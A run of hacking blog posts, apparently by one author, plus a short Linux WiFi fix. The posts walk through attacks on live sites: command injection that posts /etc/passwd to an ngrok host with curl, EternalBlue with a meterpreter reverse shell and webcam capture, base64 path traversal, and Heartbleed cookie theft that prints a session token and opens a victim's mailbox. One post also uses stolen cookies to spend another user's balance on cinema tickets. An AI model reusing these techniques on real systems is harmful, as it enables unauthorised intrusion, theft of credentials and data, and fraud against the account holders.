So back in December 2017 i found a command injection vulnerability in one of job listing site. Here is the simple proof of concept. The vulnerable parameter is filename.

I do test with this command `sleep 5` and the response is delayed for 5–6 seconds (6.113 millis). See the delay in right corner below.

 

I double check again with `sleep 10` just to make sure and got to see the difference. And again response is delayed for 10–11 seconds (11.137 millis). See the delay in right corner below.

  

I try ping to my server using `ping -c 5 ` and run tcpdump -i -n icmp on my server to see incoming ICMP packets. That ping command means send 5 times ICMP packets to my server IP address.

  

 
 
Sorry for the redacted but you can see i have incoming ICMP packets for 5 times. My server IP address is 5.000.000.105 and the incoming ICMP packets is from 000.000.39.169. Now i know the filename parameter is vulnerable to command injection.

I’m doing another test using ngrok. So i run ./ngrok http 80 on my localhost and i execute this `curl blablabla.ngrok.io` on the vulnerable parameter.

 

Now see the response on ngrok web interface (http://127.0.0.1:4040). I got incoming request from IP address 000.000.39.169. The same IP address in ICMP request above.

 

Now i can read files on the vulnerable server and send it to my ngrok address using this command `curl -F shl=@/etc/passwd blablabla.ngrok.io`. That command means send POST request to blablabla.ngrok.io with shl parameter that contains /etc/passwd in it.

 

And the result is vulnerable server send me their /etc/passwd to my ngrok address. Again from IP address 000.000.39.169.

 

Thats it! Happy hacking! :)

Just wanna share it..

I'm using this msf module https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit.

Clone it and copy paste eternalblue_doublepulsar.rb to /usr/share/metasploit-framework/modules/exploits/windows/smb/.



Run msfconsole and scan your local network with auxiliary/scanner/smb/smb_ms17_010 (MS17-010 SMB RCE Detection).



Now use the exploit exploit/windows/smb/eternalblue_doublepulsar.
Set the necessary options like RHOST, TARGETARCHITECTURE, TARGET and PROCESSINJECT.
For DOUBLEPULSARPATH and ETERNALBLUEPATH, use Eternalblue-Doublepulsar-Metasploit/deps/ directory. For example /root/Eternalblue-Doublepulsar-Metasploit/deps/.
Don't forget set the PAYLOAD windows/x64/meterpreter/reverse_tcp (my target use x64 so i'm using x64 payload too).

 

If everything sets, now run exploit.




Run some interesting command like webcam_list or webcam_snap

 



The victim desktop screenshot.

 

Tested on my local network, tool used Metasploit running in Kali Linux.
Thats it, happy hacking!


This vulnerability counts as medium risk. All you need is install Cookies Manager+ addon in firefox or any other addon/plugin that use to manipulate cookie.

Browse the page as usual.


Open Cookies Manager+ and search for vulnerable cookie parameter, in this case is C_UL parameter. Double click on it and change the content with XSS payload and Save it.





Back to the browser, refresh the page and you will see the pop-up.



Thats it! This kind of vulnerability worth 50-100 usd in bug bounty program. Happy hunting! :)


While browsing i found this cool remote file download vulnerability. :)

http://www.censored.or.id/index.php?m=default&s=download&path=c3lzdGVtL21vZHVsZXMvYmVyaXRhL2ZpbGVzL2Rvd25sb2FkLw==&file=cHJlc2VudGF0aW9uX2ZpbmFsLnBwdA==&hs=true

If i open link above, it will download a file for me. Now see the path and file parameter. It's base64 encrypt.

path=c3lzdGVtL21vZHVsZXMvYmVyaXRhL2ZpbGVzL2Rvd25sb2FkLw==
file=cHJlc2VudGF0aW9uX2ZpbmFsLnBwdA==

Decrypt both value and i got this.


path=system/modules/berita/files/download/
file=presentation_final.ppt

Now i know the path and the file name. What if i change it? Let see.

path=L2V0Yy8=
file=cGFzc3dk

I changed the path value with /etc/ and file value with passwd. Encrypt it to base64 first.

http://www.censored.or.id/index.php?m=default&s=download&path=L2V0Yy8=&file=cGFzc3dk&hs=true

This modified link will download passwd file from the system.



Thats it.. :)


*some link and value in this PoC has been cencored/changed coz this is a live website.
*admin is notified by email



Well this is an old vulnerablity called Heartbleed (CVE-2014-0160). Let's exploit this.

Run the Heartbleed exploit and you'll get the Zimbra cookie.


See the Referer and Cookie? Use that to login.

Referer: https://mx.tempo.co.id/
Cookie: ZM_TEST=true; ZM_AUTH_TOKEN=0_73ec70e72712cb16eaee148d405d1b8297c411f2_69643d33363a66356438353363632d633032372d343032302d383566322d3635636436366531623932313b6578703d31333a313438373232343637313230353b747970653d363a7a696d6272613b; JSESSIONID=1xv343h6xss51a0uhvn29oe6x

Open the Referer site in firefox who have installed Cookie Injector plugin https://mx.tempo.co.id/ and press alt+c to show the Cookie Injector.


You'll see "Wireshark Cookie Dump" there. Now paste the Cookie and click OK. You should have popup screen "All Cookie Have Been Written".


Refresh (F5) the site again and you are now login to user email.


Type password on search box and hit enter... :p



./NoGe

Hi, it's been a while since my last post.. :)



21 Cineplex is one of the largest group of cinema in Indonesia (Cinema 21, Cinema XXI and The Premiere). In this post i wanna show you guys how i buy ticket using other people account on 21 Cineplex website. Well this is an old vulnerability but they never fix it so let's have some fun. :p

Start with find user cookies and referer link.



I will use this cookies and referer link. Open the referer link in browser.



As we can see on the left side, i don't have access to this account. Now use the user cookies.
I'm using Cookie Injector to write cookies.




Copy and paste user cookies to Cookie Injector than click OK and we'll have this screen below. This means user cookies is written successfully.



Now reopen the referer link. I will automatically login to the user page.



Let's buy a ticket with this account. The account balance is Rp. 165.000.
I wanna watch Inferno :)



Select city, cinema, date, time and how many ticket that we want to buy. Click CONTINUE, select seat and click BUY NOW.




Transaction process.



And i have my free ticket.. :)
I also have the transaction code 11636 to pick up the ticket.



As we can see now the user balance is Rp. 104.000.




Thats it for today. I have movie to watch. :p



Stay safe! Stay cool! :)

 

Hi all..

I'm using HP ProBook with Kubuntu 14.04 but my WiFi keep dropping connection.
I have to reboot laptop to connect WiFi again.

I use this command to fix my WiFi problem and it's working fine.


echo "options rtl8723be fwlps=N ips=N" | sudo tee /etc/modprobe.d/rtl8723be.conf
Anyway my chipset is Realtek Semiconductor Co., Ltd. RTL8723BE PCIe Wireless Network Adapter.

This setting can be different depens on your chipset.
To see your chipset, you can use this command.

lspci

I hope this can usefull for you to!



./NoGe